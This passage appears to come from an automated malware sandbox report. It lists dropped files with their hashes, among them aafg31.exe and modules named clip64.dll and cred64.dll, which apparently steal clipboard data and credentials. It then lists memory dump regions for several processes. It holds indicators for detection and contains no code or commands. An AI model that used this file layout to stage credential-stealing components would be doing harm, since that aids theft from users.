                                                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                      SHA256

                                                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                      SHA512

                                                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                    • C:\Users\Admin\AppData\Local\Temp\aafg31.exe

                                                      Filesize

                                                      949KB

                                                      MD5

                                                      35eb44f660dba74a18da3b07a5639d59

                                                      SHA1

                                                      1bc2c80bd7d579c09749cf1e94fcfc886d69f29a

                                                      SHA256

                                                      3c3c81a5e9751c12fd812d7b0279dfe71699a2718e33bce26d941d4d1bd2bb93

                                                      SHA512

                                                      22ddc5052483b429f29719b814e4de2662884bb9bb0e6fd7e3bacd73e3f87cc70d4fdc50213faffc0125bf5b2db0367081fe35ce71070ff5a2550d6d7194757e

                                                    • C:\Users\Admin\AppData\Local\Temp\aafg31.exe

                                                      Filesize

                                                      949KB

                                                      MD5

                                                      35eb44f660dba74a18da3b07a5639d59

                                                      SHA1

                                                      1bc2c80bd7d579c09749cf1e94fcfc886d69f29a

                                                      SHA256

                                                      3c3c81a5e9751c12fd812d7b0279dfe71699a2718e33bce26d941d4d1bd2bb93

                                                      SHA512

                                                      22ddc5052483b429f29719b814e4de2662884bb9bb0e6fd7e3bacd73e3f87cc70d4fdc50213faffc0125bf5b2db0367081fe35ce71070ff5a2550d6d7194757e

                                                    • C:\Users\Admin\AppData\Local\Temp\aafg31.exe

                                                      Filesize

                                                      949KB

                                                      MD5

                                                      35eb44f660dba74a18da3b07a5639d59

                                                      SHA1

                                                      1bc2c80bd7d579c09749cf1e94fcfc886d69f29a

                                                      SHA256

                                                      3c3c81a5e9751c12fd812d7b0279dfe71699a2718e33bce26d941d4d1bd2bb93

                                                      SHA512

                                                      22ddc5052483b429f29719b814e4de2662884bb9bb0e6fd7e3bacd73e3f87cc70d4fdc50213faffc0125bf5b2db0367081fe35ce71070ff5a2550d6d7194757e

                                                    • C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\clip64.dll

                                                      Filesize

                                                      162B

                                                      MD5

                                                      1b7c22a214949975556626d7217e9a39

                                                      SHA1

                                                      d01c97e2944166ed23e47e4a62ff471ab8fa031f

                                                      SHA256

                                                      340c8464c2007ce3f80682e15dfafa4180b641d53c14201b929906b7b0284d87

                                                      SHA512

                                                      ba64847cf1d4157d50abe4f4a1e5c1996fe387c5808e2f758c7fb3213bfefe1f3712d343f0c30a16819749840954654a70611d2250fd0f7b032429db7afd2cc5

                                                    • C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll

                                                      Filesize

                                                      1.0MB

                                                      MD5

                                                      16fd83a682162d6edc119dc12c9990dc

                                                      SHA1

                                                      4b5f38c78c8e5f1333989da0912e945335f82c95

                                                      SHA256

                                                      36be2f6cccdf3edc709e7dabcbe529d4f6390d3c624ba10fb471bd05d36060c8

                                                      SHA512

                                                      5af414c95db738d0a65fdd67f2ff3923c451ee68856237f55626586aac14efe62288f5b8d74a5fbf2eaba9e6a1689cea89b856212a597ab12a3a4b0097e3f3a5

                                                    • C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll

                                                      Filesize

                                                      1.0MB

                                                      MD5

                                                      16fd83a682162d6edc119dc12c9990dc

                                                      SHA1

                                                      4b5f38c78c8e5f1333989da0912e945335f82c95

                                                      SHA256

                                                      36be2f6cccdf3edc709e7dabcbe529d4f6390d3c624ba10fb471bd05d36060c8

                                                      SHA512

                                                      5af414c95db738d0a65fdd67f2ff3923c451ee68856237f55626586aac14efe62288f5b8d74a5fbf2eaba9e6a1689cea89b856212a597ab12a3a4b0097e3f3a5

                                                    • C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll

                                                      Filesize

                                                      1.0MB

                                                      MD5

                                                      16fd83a682162d6edc119dc12c9990dc

                                                      SHA1

                                                      4b5f38c78c8e5f1333989da0912e945335f82c95

                                                      SHA256

                                                      36be2f6cccdf3edc709e7dabcbe529d4f6390d3c624ba10fb471bd05d36060c8

                                                      SHA512

                                                      5af414c95db738d0a65fdd67f2ff3923c451ee68856237f55626586aac14efe62288f5b8d74a5fbf2eaba9e6a1689cea89b856212a597ab12a3a4b0097e3f3a5

                                                    • C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll

                                                      Filesize

                                                      1.0MB

                                                      MD5

                                                      16fd83a682162d6edc119dc12c9990dc

                                                      SHA1

                                                      4b5f38c78c8e5f1333989da0912e945335f82c95

                                                      SHA256

                                                      36be2f6cccdf3edc709e7dabcbe529d4f6390d3c624ba10fb471bd05d36060c8

                                                      SHA512

                                                      5af414c95db738d0a65fdd67f2ff3923c451ee68856237f55626586aac14efe62288f5b8d74a5fbf2eaba9e6a1689cea89b856212a597ab12a3a4b0097e3f3a5

                                                    • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                      Filesize

                                                      4KB

                                                      MD5

                                                      a50c29de640e5957ed3802b419ae72c7

                                                      SHA1

                                                      c891a511854fa10544aaf44da98dc97780d54aa3

                                                      SHA256

                                                      df11e0cdaf259ac83da3b3f21fe0fde6f12d39b89f1d6ba9ba085b689b936f87

                                                      SHA512

                                                      b6ea40e1850843aa3ba7194ec0b683c6b15478c39266e6e445ee1be8f2c4d4ffc74274110fe5ca41859e9f8b746ade84577b705c9655e9f9b2d7a4bdd91e9153

                                                    • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                      Filesize

                                                      1KB

                                                      MD5

                                                      f78c1239f2684799917efb4bd4ec1db0

                                                      SHA1

                                                      4da5f2b120b406263b4e24ccb31815e5ba69e717

                                                      SHA256

                                                      eeee8ea682c3128e5cfc265b9cd10622326150030c108f2dfb8ce3d14fb66f5b

                                                      SHA512

                                                      89d65238ed7794ec3ac78a4f694ab9630bb62512d9f955b501a354f86364b203bd0c748ad6a8893ce0429dc5d6931e2b0b7da46f9764b0e8fca8b6c3be53b376

                                                    • memory/440-307-0x000001DB9E5E0000-0x000001DB9E5F0000-memory.dmp

                                                      Filesize

                                                      64KB

                                                    • memory/440-318-0x000001DB9E5E0000-0x000001DB9E5F0000-memory.dmp

                                                      Filesize

                                                      64KB

                                                    • memory/440-317-0x00007FF4E18C0000-0x00007FF4E18D0000-memory.dmp

                                                      Filesize

                                                      64KB

                                                    • memory/440-306-0x000001DB9E5E0000-0x000001DB9E5F0000-memory.dmp

                                                      Filesize

                                                      64KB

                                                    • memory/440-305-0x000001DB9E5E0000-0x000001DB9E5F0000-memory.dmp

                                                      Filesize

                                                      64KB

                                                    • memory/1176-234-0x00000157B8890000-0x00000157B88A0000-memory.dmp

                                                      Filesize

                                                      64KB

                                                    • memory/1176-233-0x00000157B8890000-0x00000157B88A0000-memory.dmp

                                                      Filesize

                                                      64KB

                                                    • memory/1180-257-0x00007FF72AB40000-0x00007FF72AEFD000-memory.dmp

                                                      Filesize

                                                      3.7MB

                                                    • memory/1180-323-0x00007FF72AB40000-0x00007FF72AEFD000-memory.dmp

                                                      Filesize

                                                      3.7MB

                                                    • memory/1180-327-0x00007FF72AB40000-0x00007FF72AEFD000-memory.dmp

                                                      Filesize

                                                      3.7MB

                                                    • memory/1320-218-0x00000246AEF60000-0x00000246AEF70000-memory.dmp

                                                      Filesize

                                                      64KB

                                                    • memory/1320-215-0x00000246AEF60000-0x00000246AEF70000-memory.dmp

                                                      Filesize

                                                      64KB

                                                    • memory/1320-217-0x00000246AEF60000-0x00000246AEF70000-memory.dmp

                                                      Filesize

                                                      64KB

                                                    • memory/1320-216-0x00000246AEF60000-0x00000246AEF70000-memory.dmp

                                                      Filesize

                                                      64KB

                                                    • memory/1560-133-0x0000000000CF0000-0x00000000011DA000-memory.dmp

                                                      Filesize

                                                      4.9MB

                                                    • memory/2280-183-0x00007FF72E970000-0x00007FF72ED2D000-memory.dmp

                                                      Filesize

                                                      3.7MB

                                                    • memory/2280-222-0x00007FF72E970000-0x00007FF72ED2D000-memory.dmp

                                                      Filesize

                                                      3.7MB

                                                    • memory/2420-331-0x00007FF68CAF0000-0x00007FF68CB06000-memory.dmp

                                                      Filesize

                                                      88KB

                                                    • memory/2548-189-0x000001917F240000-0x000001917F262000-memory.dmp

                                                      Filesize

                                                      136KB

                                                    • memory/2548-199-0x000001917EC10000-0x000001917EC20000-memory.dmp

                                                      Filesize

                                                      64KB

                                                    • memory/2548-200-0x000001917EC10000-0x000001917EC20000-memory.dmp

                                                      Filesize

                                                      64KB

                                                    • memory/2548-201-0x000001917EC10000-0x000001917EC20000-memory.dmp

                                                      Filesize

                                                      64KB

                                                    • memory/2560-271-0x00000206F12E0000-0x00000206F12F0000-memory.dmp

                                                      Filesize

                                                      64KB

                                                    • memory/2560-273-0x00000206F12E0000-0x00000206F12F0000-memory.dmp

                                                      Filesize

                                                      64KB

                                                    • memory/2560-290-0x00000206F2890000-0x00000206F2896000-memory.dmp

                                                      Filesize

                                                      24KB

                                                    • memory/2560-272-0x00000206F12E0000-0x00000206F12F0000-memory.dmp

                                                      Filesize

                                                      64KB

                                                    • memory/2560-289-0x00000206F2860000-0x00000206F2868000-memory.dmp

                                                      Filesize

                                                      32KB

                                                    • memory/2560-288-0x00000206F28B0000-0x00000206F28CA000-memory.dmp

                                                      Filesize

                                                      104KB

                                                    • memory/2560-287-0x00000206F2850000-0x00000206F285A000-memory.dmp

                                                      Filesize

                                                      40KB

                                                    • memory/2560-286-0x00000206F2870000-0x00000206F288C000-memory.dmp

                                                      Filesize

                                                      112KB

                                                    • memory/2560-285-0x00007FF4B1A30000-0x00007FF4B1A40000-memory.dmp

                                                      Filesize

                                                      64KB

                                                    • memory/2560-284-0x00000206F2700000-0x00000206F270A000-memory.dmp

                                                      Filesize

                                                      40KB

                                                    • memory/2560-283-0x00000206F2620000-0x00000206F263C000-memory.dmp

                                                      Filesize

                                                      112KB

                                                    • memory/2560-291-0x00000206F28A0000-0x00000206F28AA000-memory.dmp

                                                      Filesize

                                                      40KB

                                                    • memory/4536-328-0x000001D86C5A0000-0x000001D86C5C0000-memory.dmp

                                                      Filesize

                                                      128KB

                                                    • memory/4536-339-0x000001D86CCC0000-0x000001D86CCE0000-memory.dmp

                                                      Filesize

                                                      128KB

                                                    • memory/4536-329-0x00007FF74ADE0000-0x00007FF74B5D4000-memory.dmp

                                                      Filesize

                                                      8.0MB

                                                    • memory/4536-330-0x000001D86CC70000-0x000001D86CCB0000-memory.dmp

                                                      Filesize

                                                      256KB

                                                    • memory/4536-344-0x00007FF74ADE0000-0x00007FF74B5D4000-memory.dmp

                                                      Filesize

                                                      8.0MB

                                                    • memory/4536-332-0x00007FF74ADE0000-0x00007FF74B5D4000-memory.dmp

                                                      Filesize

                                                      8.0MB

                                                    • memory/4536-333-0x00007FF74ADE0000-0x00007FF74B5D4000-memory.dmp

                                                      Filesize

                                                      8.0MB

                                                    • memory/4536-335-0x00007FF74ADE0000-0x00007FF74B5D4000-memory.dmp

                                                      Filesize

                                                      8.0MB

                                                    • memory/4536-336-0x000001D86CCC0000-0x000001D86CCE0000-memory.dmp

                                                      Filesize

                                                      128KB

                                                    • memory/4536-338-0x00007FF74ADE0000-0x00007FF74B5D4000-memory.dmp

                                                      Filesize

                                                      8.0MB

                                                    • memory/4536-341-0x00007FF74ADE0000-0x00007FF74B5D4000-memory.dmp

                                                      Filesize

                                                      8.0MB

                                                    • memory/4832-177-0x0000022DC24C0000-0x0000022DC25EF000-memory.dmp

                                                      Filesize

                                                      1.2MB

                                                    • memory/4832-176-0x0000022DC2350000-0x0000022DC24BE000-memory.dmp

                                                      Filesize

                                                      1.4MB

                                                    • memory/4832-184-0x0000022DC24C0000-0x0000022DC25EF000-memory.dmp

                                                      Filesize

                                                      1.2MB